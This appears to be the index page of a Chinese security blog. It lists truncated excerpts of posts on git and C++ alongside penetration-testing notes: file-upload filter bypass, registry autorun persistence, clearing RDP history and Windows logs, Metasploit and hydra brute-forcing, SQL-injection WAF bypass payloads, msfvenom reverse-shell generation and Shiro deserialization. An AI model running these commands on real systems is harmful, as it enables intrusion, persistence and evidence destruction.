摘要：获取项目： git clone XXX 下拉最新代码： git pull git add . 增加备注： git commit -m "XXX" 上传最新代码： git push 阅读全文

摘要：文件上传tips 文件名前缀加[0x09]绕过： ——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”[0x09]test.asp” Content-Type: 阅读全文

摘要：0x01类 基本操作 #include <iostream> using namespace std; class BOX { public: double changdu; double kuandu; double gaodu; }; int main() { BOX b1; BOX b2; d 阅读全文

摘要：0x13 引用 引用变量时一个别名，是某个已存在的变量的另个名字，一旦把引用初始化为某个变量，就可以使用该引用名称或变量名称来指向变量 引用与指针的区别 不存在空引用，引用必须连接到一块合法的内存 一旦引用被初始化为一个对象，就不能被指向到另一个对象，指针可以在任何时候指向到另一个对象 引用必须在创 阅读全文

摘要：0x09 数字 通常，当我们需要用到数字时，我们会使用原始的数据类型，如 int、short、long、float 和 double 等等。这些用于数字的数据类型，其可能的值和数值范围 常用姿势 #include <iostream> using namespace std; int main () 阅读全文

摘要：0x05 运算符 算数运算符 运算符 描述 实例 + 把两个操作数相加 A + B 将得到 30 - 从第一个操作数中减去第二个操作数 A - B 将得到 -10 * 把两个操作数相乘 A * B 将得到 200 / 分子除以分母 B / A 将得到 2 % 取模运算符，整除后的余数 B % A 将 阅读全文

摘要：0x01 基本语法 简介 对象：对象具有的状态与行为 类：描述对象状态、行为的模板 方法：一个方法标识一个行为，一个类可以包含多个方法，能够在方法中写入逻辑、操作数据及所有执行的动作 限时变量：每个对象都有其独有的即时变量，对象的状态是由这些即时变量创建的 基本语法 #include <iostre 阅读全文

摘要：适用于dll或者自启动 reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v bug /t REG_SZ /d "C:\bug\bug.exe" reg add "HKEY_L 阅读全文

摘要：rem clear all reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft 阅读全文

摘要：MSF服务爆破 此处自行解决如何进入内网，可vpn可socks代理 SMB爆破 msf5 > use auxiliary/scanner/smb/smb_login msf5 auxiliary(scanner/smb/smb_login) > set rhosts file:/home/yang/ 阅读全文

摘要：常用攻击手段 确认端口开启 常用爆破 hydra -v -f -l administrator -P /home/yang/Desktop/pass.txt rdp://192.168.3.142 DOS攻击 检测ms12-020漏洞存在 msf5 > use auxiliary/scanner/r 阅读全文

摘要：基础 大小写 id=-1 uNIoN sELecT 1,2,3 双写 id=-1 UNIunionON SELselectECT 1,2,3 编码 id=1%252f%252a*/UNION%252f%252a /SELECT id=1%D6‘%20AND%201=2%23 SELECT 'Ä'=' 阅读全文

摘要：windows痕迹清理 日志路径： 系统日志：%SystemRoot%\System32\Winevt\Logs\System.evtx 安全日志：%SystemRoot%\System32\Winevt\Logs\Security.evtx 应用程序日志：%SystemRoot%\System32 阅读全文

摘要：curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && c 阅读全文

摘要：关注日志路径 C:/Windows/System32/winevt/Logs/ C:/WINDOWS/system32/config Dumpel 本地或远程导出日志 dumpel -f file [-s \\server] [-l log [-m source]] [-e n1 n2 n3..] 阅读全文

摘要：格式未整理，不过都是搞技术的，自行忽略格式，看看相关理论才是最重要吧 术语 工作组:工作组是局域网中的一个概念，他是长久的资源管理模式。默认情况下使用工作组方式进行资源管理，将不同的computer按照不同的要求分类到不同的组 域:用来描述一种架构，和“工作组”相对应，由工作组升级而来的高级架构，域 阅读全文

摘要：仅供学习代码使用，务必遵守网络安全法，若用于非法目的于本人无关 漏洞及渗透练习平台： WebGoat漏洞练习环境 https://github.com/WebGoat/WebGoat https://github.com/WebGoat/WebGoat-Legacy • Damn Vulnerabl 阅读全文

摘要： 阅读全文

摘要： 阅读全文

摘要：偶然某群内发现的好东西，做个转载分享 Shiro反序列化漏洞利用笔记 Apache Shiro是一个强大且易用的Java安全框架，执行身份验证、授权、密码和会话管理。目前在Java web应用安全框架中，最热门的产品有Spring Security和Shiro，二者在核心功能上几乎差不多，但Shir 阅读全文

摘要：##反向 Windows meterpreter msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > test.exe shell msfvenom -p windows/shell/reverse_tcp LHOST 阅读全文

摘要：##137、138、139 NetBios端口，137、138主要用于内网传输文件，139主要用于NetBios服务 ##135 该端口主要使用DCOM和RPC（Remote Procedure Call）服务，也可用于WMI（Windows Management Instrumentation）进 阅读全文

摘要：##转载分享存档，仅供学习代码使用，用于其他非法目的与本人无关。 ###作者链接 https://github.com/r0eXpeR/redteam_vul #EHole(棱洞)-红队重点攻击系统指纹探测工具 ##一、简介： ______ __ ______ / ____/___/ /___ __ 阅读全文

摘要：##转载分享存档，仅供学习代码使用，用于其他非法目的与本人无关。 ###作者链接 https://github.com/r0eXpeR/redteam_vul ##一、OA系统 ####泛微(Weaver-Ecology-OA) 🔸 泛微OA E-cology RCE(CNVD-2019-3220 阅读全文

摘要：###简介 全称：Local Administrator Password Solution 将本地管理员密码存储在LDAP上，作为计算机账户的一个机密属性，配合GPO，实现自动定期修改密码、设置密码长度、强度等，然后配置某些指的账号，能查看存储的密码， 如果用户需要，可以用PowerShell或指 阅读全文